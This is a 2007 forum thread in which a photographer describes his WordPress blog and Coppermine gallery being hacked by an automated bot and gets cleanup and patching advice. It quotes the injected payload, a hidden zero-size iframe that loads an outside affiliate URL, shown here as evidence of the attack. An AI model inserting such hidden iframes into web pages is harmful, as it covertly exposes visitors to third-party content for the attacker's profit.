Topic: My Site was Hacked (Page 1 of 1)

I never use IE, but we have it at work and I was showing my site to a colleague and noticed the sidebar had been pushed into the bottom. Damn IE i thought. Tonight I ran FF and the site rendered perfectly, but not so in IE.

I googled and checked forums but could not find a solution although I'm not the first to have this problem (WordPress).

I fiddled with the CSS file and nothing worked, so next I looked at the source code of the pages and found this piece of crap:

<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

I restored my blog from backup files but I still don't understand how the hell I was hacked. Is this a server attack or is it my blog vulnerability. I'll continue to google but if anyone has any suggestions for prevention please post em.


Nature & Travel Photography
Visit the Sleeping Wolves

edit: I checked other portions of the site -just found the forums and pixelpost pages are ok, but the coppermine gallery has been hacked as well.


(Edited by SleepingWolf on 08-31-2007 00:25)

oh my.

We need more background to help though - what blog where you running, are you controlling the server itself (are you root) or is it a shared hosting enviroment?

From the damage, it looks like you were hit by an automatic hacking system that went in through a wide spread vulnerability - but it's impossible to say without
your logs and so on.

Just rolling back a backup will not help - your machine, or at least the web directory has been compromised, and we need to decide which it is to take appropriate actions.
If it's a security hole in the blog software you use , you're still vulnerable.

so long,

->Tyberius Prime

TP:
Will try to answer later. The MySQL db is not compromised as far as I can tell.
The files I restored are files such as index.php etc...., this has fixed the problem in IE and removed the iFrames, for now ..yes, I'm still vulnerable.

Nature & Travel Photography
Visit the Sleeping Wolves

Edit: Update - I wasn't able to find much on google, so I cleaned-up myself. I FTP'd the Coppermine files back to my hard drive and searched for the code. I then did a search and replace, replacing the code with zilch. I then FTP'd back the clean files.

So the problem is solved for now, but the vulnerability is still there.

(Edited by SleepingWolf on 08-31-2007 03:39)

Nasty stuff. I have had hackers trying to place a file on my server (they did succeed once), where this file in turn used fopen() to open a nasty file which did all sorts of bad things. Needless to say, fopen() is no longer enabled in my php.ini file!

Workpage http://www.vitaleffect.com/
Homepage: http://www.dolphinstreet.com/

You've changed all your passwords, for your database, FTP, shell access, administration sections of all your various web apps, and so on? That would be a good idea right now. By the way, who's your webhost?


Justice 4 Pat Richard

quote:

---

Skaarjj said:

You've changed all your passwords, for your database, FTP, shell access, administration sections of all your various web apps, and so on? That would be a good idea right now. By the way, who's your webhost?Justice 4 Pat Richard

---

No, I'm not sure I need to. My webhost (webserve.ca) were usesless but confirmed what I thought, this was a bot attack which exploited php vulnerabilities - one in WordPress and one in the Coppermine gallery. Passwords were not used. Sadly, when I upgraded Coppermine last night it broke what I had repaired...the gallery is down...thankfully it is backedup.

The hack is a mainstream one I'm sure, but 99% of users will never know they are infected unless they see a CSS change or watch each file load up and see transfers from strange domains.

Nature & Travel Photography
Visit the Sleeping Wolves

Update: I upgraded Coppermine to the lastest release 1.4.12 - very easy - nothing lost and hopefully not as vulnerable as the release i was using.

Nature & Travel Photography
Visit the Sleeping Wolves

It's common that script kiddies will find vulnerabilities and exploit them every chance they get.

when you run things like Wordpress, Coppermine, phpBB a good site to keep checking with is http://secunia.com. Do a search for your apps that you run like Wordpress to see if you are vulnerable so you can patch it.

Later,

C:\

I've a huge issue with WP - the issue is that I have spent hours and hours customizing not only the themes but also the scripts. On top of that, I also spend hours tweaking some javascript plugins (Highslide) which allow my pics to be presented as thumbnails and clicked on to zoom in.

So this kind of stupid attack - the objective is to get ad revenue for the hacker - I can live with (removing the code involved 1 file + I have all the files and the mysql database backed up).

Comments on the site need to be moderated, so that kind of attack is unlikely and users can't login to my blog.

So I have to weigh the risk versus the benefits - I need to better understand the WP upgrade process, to see what might break - versus the risk of a more serious attack...although I'm not even sure what that would entail.

CMS apps come at a high price - security - it's patch or die - but I love my blog, it's so easy to use.

Just one more thing to mention - my host, webserve.ca was less than helpful.

Nature & Travel Photography
Visit the Sleeping Wolves